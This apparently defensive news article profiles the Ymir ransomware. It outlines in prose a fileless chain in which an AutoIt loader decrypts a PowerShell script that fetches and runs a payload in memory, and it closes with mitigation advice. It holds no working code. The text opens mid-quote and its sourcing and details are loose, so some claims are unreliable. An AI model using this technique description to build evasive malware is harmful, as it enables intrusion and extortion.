Unmasking the New Ymir Ransomware: Stealthy Memory Exploits Targeting Corporate Networks
of stealthy in-memory exploits, combined with selective file encryption and malicious routines executed before payload deployment, resulting in the evasion of intrusion detection.”
Ymir’s Modus Operandi:
Ymir utilizes fileless execution through script-based launchers and payloads hidden within the victim’s computer memory.
These techniques render traditional signature-based defensive measures quite ineffective.
Ymir’s memory-resident nature obliges it to encrypt files during its first execution itself as it disappears from the system memory after a reboot, leaving few traces behind.
This lends it a stealthy profile that aids in sneaking past various intrusion detection systems.
The Stealth Matrix:
Ymir typically follows a two-stage attack process.
The first stage involves a seemingly benign executable (.exe) using AutoIt (a freeware automation language) to unpack and unencrypt a PowerShell script.
The script then downloads a secondary payload from a remote server and executes it directly in memory.
This modus operandi evades detection, as the malware never writes the secondary payload to disk.
The second stage is rather unique where Ymir prioritizes encryption of corporate file types such as .docx, .xlsx, and .pptx.
However, in a novel departure from typical ransomware behavior, it avoids encrypting system files that might alert administrators with system errors.
Real-World Impact
A large-scale IT company recently fell victim to an Ymir ransomware attack.
Personal files and vital company databases exceeded 10TB of data encrypted overnight.
Although they had beefed up security measures, due to the sophisticated tactics employed by Ymir, intrusion was undetected.
Advice and Precautions:
Cybersecurity experts suggest a multi-fold approach to deal with threats like Ymir.
Experts advocate deploying advanced endpoint detection and response (EDR) measures capable of detecting anomalies in system behavior should receive priority.
Enterprises should adopt prevention techniques such as regular patching of software, restricting PowerShell use, and staff education on phishing scams.
References:
1.
Russian cybersecurity vendor Kaspersky: https://www.kaspersky.com/about/press-releases/2021ymir-ransomware
Follow-Up Reading:
1.
Advanced endpoint detection and response (EDR) measures: https://www.gartner.com/en/information-technology/glossary/endpoint-detection-and-response-edr
2.
The importance of regular software patching: https://www.csoonline.com/article/3235944/why-patching-is-still-a-problem-and-how-to-fix-it.html
3.
How to identify and avoid phishing scams: https://www.nist.gov/blogs/cybersecurity-insights/avoiding-phishing-attacks